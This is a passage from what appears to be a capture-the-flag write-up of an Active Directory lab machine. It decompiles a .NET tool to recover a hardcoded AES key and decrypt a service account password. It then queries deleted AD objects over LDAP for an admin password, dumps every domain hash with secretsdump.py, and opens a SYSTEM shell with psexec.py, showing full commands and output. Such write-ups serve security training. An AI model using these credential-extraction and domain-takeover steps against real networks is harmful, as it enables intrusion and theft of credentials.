getting file \x86\SQLite.Interop.dll of size 1246720 as x86/SQLite.Interop.dll (1129.4 KiloBytes/sec) (average 711.3 KiloBytes/sec)
```

## Reverse engineering .NET application

```console
opcode@debian$ cat RunAudit.bat 
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
```

```console
opcode@debian$ file CascAudit.exe 
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
opcode@debian$ file CascCrypto.dll 
CascCrypto.dll: PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 4 sections
```

It is a .NET application, and [dotPeek](https://www.jetbrains.com/decompiler/) can be used for reverse engineering.  
I opened `CascAudit.exe` and navigated to `MainModule` in `CascAudiot` namespace:

```cs
using CascAudiot.My;
using CascCrypto;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Data.SQLite;
using System.DirectoryServices;

namespace CascAudiot
{
  [StandardModule]
  internal sealed class MainModule
  {
    private const int USER_DISABLED = 2;

    [STAThread]
    public static void Main()
    {
      if (MyProject.Application.CommandLineArgs.Count != 1)
      {
        Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
      }
      else
      {
        using (SQLiteConnection connection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
        {
          string empty1 = string.Empty;
          string str = string.Empty;
          string empty2 = string.Empty;
          try
          {
            connection.Open();
            using (SQLiteCommand sqLiteCommand = new SQLiteCommand("SELECT * FROM LDAP", connection))
            {
              using (SQLiteDataReader sqLiteDataReader = sqLiteCommand.ExecuteReader())
              {
                sqLiteDataReader.Read();
                empty1 = Conversions.ToString(sqLiteDataReader["Uname"]);
                empty2 = Conversions.ToString(sqLiteDataReader["Domain"]);
                string EncryptedString = Conversions.ToString(sqLiteDataReader["Pwd"]);
                try
                {
                  str = Crypto.DecryptString(EncryptedString, "c4scadek3y654321");
                }
                catch (Exception ex)
                {
                  ProjectData.SetProjectError(ex);
                  Console.WriteLine("Error decrypting password: " + ex.Message);
                  ProjectData.ClearProjectError();
                  return;
                }
              }
            }
            connection.Close();
          }
          catch (Exception ex)
          {
            ProjectData.SetProjectError(ex);
            Console.WriteLine("Error getting LDAP connection data From database: " + ex.Message);
            ProjectData.ClearProjectError();
            return;
          }
          int num = 0;
          using (DirectoryEntry searchRoot = new DirectoryEntry())
          {
            searchRoot.Username = empty2 + "\\" + empty1;
            searchRoot.Password = str;
            searchRoot.AuthenticationType = AuthenticationTypes.Secure;
            using (DirectorySearcher directorySearcher = new DirectorySearcher(searchRoot))
            {
              directorySearcher.Tombstone = true;
              directorySearcher.PageSize = 1000;
              directorySearcher.Filter = "(&(isDeleted=TRUE)(objectclass=user))";
              directorySearcher.PropertiesToLoad.AddRange(new string[3]
              {
                "cn",
                "sAMAccountName",
                "distinguishedName"
              });
              using (SearchResultCollection all = directorySearcher.FindAll())
              {
                Console.WriteLine("Found " + Conversions.ToString(all.Count) + " results from LDAP query");
                connection.Open();
                try
                {
                  try
                  {
                    foreach (SearchResult searchResult in all)
                    {
                      string empty3 = string.Empty;
                      string empty4 = string.Empty;
                      string empty5 = string.Empty;
                      if (searchResult.Properties.Contains("cn"))
                        empty3 = Conversions.ToString(searchResult.Properties["cn"][0]);
                      if (searchResult.Properties.Contains("sAMAccountName"))
                        empty4 = Conversions.ToString(searchResult.Properties["sAMAccountName"][0]);
                      if (searchResult.Properties.Contains("distinguishedName"))
                        empty5 = Conversions.ToString(searchResult.Properties["distinguishedName"][0]);
                      using (SQLiteCommand sqLiteCommand = new SQLiteCommand("INSERT INTO DeletedUserAudit (Name,Username,DistinguishedName) VALUES (@Name,@Username,@Dn)", connection))
                      {
                        sqLiteCommand.Parameters.AddWithValue("@Name", (object) empty3);
                        sqLiteCommand.Parameters.AddWithValue("@Username", (object) empty4);
                        sqLiteCommand.Parameters.AddWithValue("@Dn", (object) empty5);
                        checked { num += sqLiteCommand.ExecuteNonQuery(); }
                      }
                    }
                  }
                  finally
                  {
                    IEnumerator enumerator;
                    if (enumerator is IDisposable)
                      (enumerator as IDisposable).Dispose();
                  }
                }
                finally
                {
                  connection.Close();
                  Console.WriteLine("Successfully inserted " + Conversions.ToString(num) + " row(s) into database");
                }
              }
            }
          }
        }
      }
    }
  }
}
```

The program takes an argument: path to a SQLite database.  
From the database, it extracts `Uname`,`Domain`, and `Pwd` from the `LDAP` table.  
The `Pwd` is encrypted and needs to be decrypted using the password `c4scadek3y654321`

For decryption, the class `Crypto` is used. If we right-click and click `Go to implementation`, it says implementations were not found.  
But if we right-click and click `Locate in Assembly Explorer`, it would open the `CascCrypto.dll` and find the implementation there:

```cs
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace CascCrypto
{
  public class Crypto
  {
    public const string DefaultIV = "1tdyjCbY1Ix49842";
    public const int Keysize = 128;

    public static string EncryptString(string Plaintext, string Key)
    {
      byte[] bytes = Encoding.UTF8.GetBytes(Plaintext);
      Aes aes = Aes.Create();
      aes.BlockSize = 128;
      aes.KeySize = 128;
      aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
      aes.Key = Encoding.UTF8.GetBytes(Key);
      aes.Mode = CipherMode.CBC;
      using (MemoryStream memoryStream = new MemoryStream())
      {
        using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, aes.CreateEncryptor(), CryptoStreamMode.Write))
        {
          cryptoStream.Write(bytes, 0, bytes.Length);
          cryptoStream.FlushFinalBlock();
        }
        return Convert.ToBase64String(memoryStream.ToArray());
      }
    }

    public static string DecryptString(string EncryptedString, string Key)
    {
      byte[] buffer = Convert.FromBase64String(EncryptedString);
      Aes aes = Aes.Create();
      aes.KeySize = 128;
      aes.BlockSize = 128;
      aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
      aes.Mode = CipherMode.CBC;
      aes.Key = Encoding.UTF8.GetBytes(Key);
      using (MemoryStream memoryStream = new MemoryStream(buffer))
      {
        using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
        {
          byte[] numArray = new byte[checked (buffer.Length - 1 + 1)];
          cryptoStream.Read(numArray, 0, numArray.Length);
          return Encoding.UTF8.GetString(numArray);
        }
      }
    }
  }
}
```

It is using AES-CBC with fixed IV `1tdyjCbY1Ix49842`. We can implement the decryption in Python.  
But first, we need to extract the values from the SQLite database:

```console
opcode@debian$ sqlite3 Audit.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
```

Then I wrote a Python script to decrypt AES-CBC: [decrypt_aes_cbc.py](decrypt_aes_cbc.py)

```py
from Crypto.Cipher import AES
from base64 import b64decode

ct  = b64decode('BQO5l5Kj9MdErXx6Q6AGOw==')
key = b'c4scadek3y654321'
iv  = b'1tdyjCbY1Ix49842'

cipher = AES.new(key, AES.MODE_CBC, iv)

pt = cipher.decrypt(ct)
print(pt.decode())
```

```console
opcode@debian$ python3 decrypt_aes_cbc.py 
w3lc0meFr31nd
```

Therefore, we have another set of credentials: `ArkSvc:w3lc0meFr31nd`

## Finding credentials in deleted objects

Since the account `ArkSvc` is associated with `ARK AD RECYCLE BIN MANAGER`, it should have access to the `Deleted Objects` container:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -D 'cascade\ArkSvc' -w 'w3lc0meFr31nd' -b 'CN=Deleted Objects,DC=cascade,DC=local' -LLL
No such object (32)
Matched DN: CN=Deleted Objects,DC=cascade,DC=local
Additional information: 0000208D: NameErr: DSID-0310020A, problem 2001 (NO_OBJECT), data 0, best match of:
    'CN=Deleted Objects,DC=cascade,DC=local'
```

That was weird. After a hardcore google session, I learnt that the [`LDAP_SERVER_SHOW_DELETED_OID`](https://learn.microsoft.com/en-in/previous-versions/windows/desktop/ldap/ldap-server-show-deleted-oid) control needs to be used with an extended LDAP search function to include deleted objects in search result.

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -D 'cascade\ArkSvc' -w 'w3lc0meFr31nd' -b 'CN=Deleted Objects,DC=cascade,DC=local' -e 1.2.840.113556.1.4.417 dn -LLL
dn: CN=Deleted Objects,DC=cascade,DC=local

dn: CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local

dn: CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local

dn: CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local

dn: CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local

dn: CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local

dn: CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
```

Out of these, `TempAdmin` is the one we want. The email from SMB share mentioned that his password is the same as the Administrator's.

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -D 'cascade\ArkSvc' -w 'w3lc0meFr31nd' -b 'CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local' -e 1.2.840.113556.1.4.417 -LLL   
dn: CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn:: VGVtcEFkbWluCkRFTDpmMGNjMzQ0ZC0zMWUwLTQ4NjYtYmNlYi1hODQyNzkxY2EwNTk=
givenName: TempAdmin
distinguishedName: CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
[--SNIP--]
sAMAccountName: TempAdmin
userPrincipalName: TempAdmin@cascade.local
lastKnownParent: OU=Users,OU=UK,DC=cascade,DC=local
dSCorePropagationData: 20200127032308.0Z
dSCorePropagationData: 16010101000000.0Z
msDS-LastKnownRDN: TempAdmin
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
```

Once again, it has a base64 encoded string in the `cascadeLegacyPwd` attribute, which decodes to `baCT3r1aN00dles`

```console
opcode@debian$ secretsdump.py cascade.local/Administrator:baCT3r1aN00dles@CASC-DC1.cascade.local -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
cascade.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:7c2ea40b06d267f1557a09ac086b4487:::
cascade.local\CascGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a1b37192392d74e86d04242288dc147:::
cascade.local\arksvc:1106:aad3b435b51404eeaad3b435b51404ee:10ffc991edaa4635cf81eb91762420cb:::
cascade.local\s.smith:1107:aad3b435b51404eeaad3b435b51404ee:b48b49789458698abadc119c8e310703:::
cascade.local\r.thompson:1109:aad3b435b51404eeaad3b435b51404ee:63251f7b1bada5082e5ffb18261ba28f:::
cascade.local\util:1111:aad3b435b51404eeaad3b435b51404ee:49a914ea7201025aeff21cd858ec7d66:::
cascade.local\j.wakefield:1116:aad3b435b51404eeaad3b435b51404ee:13ae5d7704258917054d662d016eab60:::
cascade.local\s.hickson:1121:aad3b435b51404eeaad3b435b51404ee:2776416ceb426c515cab11bb8411067b:::
cascade.local\j.goodhand:1122:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\a.turnbull:1124:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\e.crowe:1127:aad3b435b51404eeaad3b435b51404ee:95d4f729c16ae37b910317d665ba2215:::
cascade.local\b.hanson:1128:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\d.burman:1129:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\BackupSvc:1130:aad3b435b51404eeaad3b435b51404ee:c27e154566c4788326fce339f4b55491:::
cascade.local\j.allen:1134:aad3b435b51404eeaad3b435b51404ee:64928a685f9a995045f8c04bbf86881d:::
cascade.local\i.croft:1135:aad3b435b51404eeaad3b435b51404ee:431682a8242a237e805badacab95b0e4:::
CASC-DC1$:1001:aad3b435b51404eeaad3b435b51404ee:faa778ceebb34be5ce0527ce95613b99:::
[*] Kerberos keys grabbed
cascade.local\administrator:aes256-cts-hmac-sha1-96:201b2d849679d315b51959d1acd879032e1f6dba6fa9feb772a2d985edc2c2cf
cascade.local\administrator:aes128-cts-hmac-sha1-96:5ebdd49d14c5b62141ab0e6a2780ef70
cascade.local\administrator:des-cbc-md5:1532f8259b2c4f45
krbtgt:aes256-cts-hmac-sha1-96:25deaf37ed42e5cd95b76850d9d76fa663fcce3a9512f31357f5e45d333ca5ea
krbtgt:aes128-cts-hmac-sha1-96:22f5ccb8e68382406cb6e3c24c706208
krbtgt:des-cbc-md5:fba77f5b31239d9e
cascade.local\arksvc:aes256-cts-hmac-sha1-96:3717cd1cd9e13ac692bd99e0de0bbdd7910296f8d1f465cb559f76eb63f21bcc
cascade.local\arksvc:aes128-cts-hmac-sha1-96:0e34dc2f704261583d5f0bfbdf4cac14
cascade.local\arksvc:des-cbc-md5:73f2c423982534a8
cascade.local\s.smith:aes256-cts-hmac-sha1-96:c5b64b93302ccfb91648acea44a708797371bcec306a74a42d614365329635ce
cascade.local\s.smith:aes128-cts-hmac-sha1-96:4cc2dc914d7d971f3708dba510b1a1e9
cascade.local\s.smith:des-cbc-md5:6be0fdeab6cec762
cascade.local\r.thompson:aes256-cts-hmac-sha1-96:d5bf934e36dbbb73b35345f08117b844874b343c9149095ff86034172272259e
cascade.local\r.thompson:aes128-cts-hmac-sha1-96:def0284f32bcaa0291184f0e6b2a8af0
cascade.local\r.thompson:des-cbc-md5:89e3da3dc74576d9
cascade.local\util:aes256-cts-hmac-sha1-96:9e74ea4fa951ebe411bb9d734c48202fd346a21e414bc61c49ff14b41ba14bb5
cascade.local\util:aes128-cts-hmac-sha1-96:cadfed05f20d4ca27ffa30b30664dbae
cascade.local\util:des-cbc-md5:c4a8765b4f3db901
cascade.local\j.wakefield:aes256-cts-hmac-sha1-96:c3a6a1518a513ef2344859b204692d92adea4c78a6b8539e1743cfcbeb85dc5c
cascade.local\j.wakefield:aes128-cts-hmac-sha1-96:134734b88534d38ce5bd786bac268f07
cascade.local\j.wakefield:des-cbc-md5:a876678997570e6d
cascade.local\s.hickson:aes256-cts-hmac-sha1-96:ebdd5dd6e9d0dfac16983b005db8e84b482250740bc3e64b0e58ae30f7e7a7b5
cascade.local\s.hickson:aes128-cts-hmac-sha1-96:83b64186d9c5d8e74b44d6efa3b19ed7
cascade.local\s.hickson:des-cbc-md5:ce8c2f9dfe3b3ddf
cascade.local\j.goodhand:aes256-cts-hmac-sha1-96:770b3bd99ce9b17bbf3e35a839615eb1204cbae05990db83e9393a2564c2f8ed
cascade.local\j.goodhand:aes128-cts-hmac-sha1-96:11ccc9eea5401915a46406441e50ed8f
cascade.local\j.goodhand:des-cbc-md5:fb9226a16d94ba64
cascade.local\a.turnbull:aes256-cts-hmac-sha1-96:4adfe6a4be270895c5a55e440e2a14d70db45f4729d82caff0c157140729f3f1
cascade.local\a.turnbull:aes128-cts-hmac-sha1-96:89c3c86c69648eea1e589db7316710ae
cascade.local\a.turnbull:des-cbc-md5:2c076e23493ef7ba
cascade.local\e.crowe:aes256-cts-hmac-sha1-96:c6459e3f1647f02bd9528bca926beb8bfc944b42f3b12d9777fbdc59431fdc43
cascade.local\e.crowe:aes128-cts-hmac-sha1-96:6d36444d8f1b1a4bda6d7c4118ed61d9
cascade.local\e.crowe:des-cbc-md5:f445588fae23a729
cascade.local\b.hanson:aes256-cts-hmac-sha1-96:a6071c3a20a3ce2e373e8586ef7bd12cb665eb6ee66d110df57ee9f703b528f0
cascade.local\b.hanson:aes128-cts-hmac-sha1-96:34f9f21922871be23e9bedc3fc1741cd
cascade.local\b.hanson:des-cbc-md5:57ef54d568d03e86
cascade.local\d.burman:aes256-cts-hmac-sha1-96:b6a2a64a272ba6c7d2cf638b8614a370d597bc167222555ec655facca6ebfe08
cascade.local\d.burman:aes128-cts-hmac-sha1-96:310087249254f69e0436b2113f08909e
cascade.local\d.burman:des-cbc-md5:83313268372502c2
cascade.local\BackupSvc:aes256-cts-hmac-sha1-96:ffba7ff6b18eba90d46d787e56a0a0ebba7c8d933f992f2b896e5c7ec7da8720
cascade.local\BackupSvc:aes128-cts-hmac-sha1-96:854bd600cad9e7cd309eb124039b25a7
cascade.local\BackupSvc:des-cbc-md5:9ea4d0da8cdcbcef
cascade.local\j.allen:aes256-cts-hmac-sha1-96:56a9256363211ec2ac9ac5d64ddc931b10123bdf4ce4a90c4eee14aab91e401a
cascade.local\j.allen:aes128-cts-hmac-sha1-96:7f03f34bc8c2919a6b6ddd22c983d23c
cascade.local\j.allen:des-cbc-md5:a1b0c14f0ec715a8
cascade.local\i.croft:aes256-cts-hmac-sha1-96:a26cfa25eeb98248137d57f00a509aca41a091218b5a9971ca6af7cd0552c469
cascade.local\i.croft:aes128-cts-hmac-sha1-96:ac531c4553b8f5c2f62614d91e9864e5
cascade.local\i.croft:des-cbc-md5:b6f89862bf854cf1
CASC-DC1$:aes256-cts-hmac-sha1-96:0b44acbdd30e636b46f9ababd43c897441453c7cc7e7805e576a51fa97e4387e
CASC-DC1$:aes128-cts-hmac-sha1-96:99667ece295db038946239771286e182
CASC-DC1$:des-cbc-md5:02fd0b70a1753d46
[*] Cleaning up... 
```

We can also use `psexec.py` to obtain a shell as system:

```console
opcode@debian$ psexec.py cascade.local/Administrator:baCT3r1aN00dles@CASC-DC1.cascade.local
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on CASC-DC1.cascade.local.....
[*] Found writable share ADMIN$
[*] Uploading file OxkRAayz.exe
[*] Opening SVCManager on CASC-DC1.cascade.local.....
[*] Creating service szlm on CASC-DC1.cascade.local.....
[*] Starting service szlm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
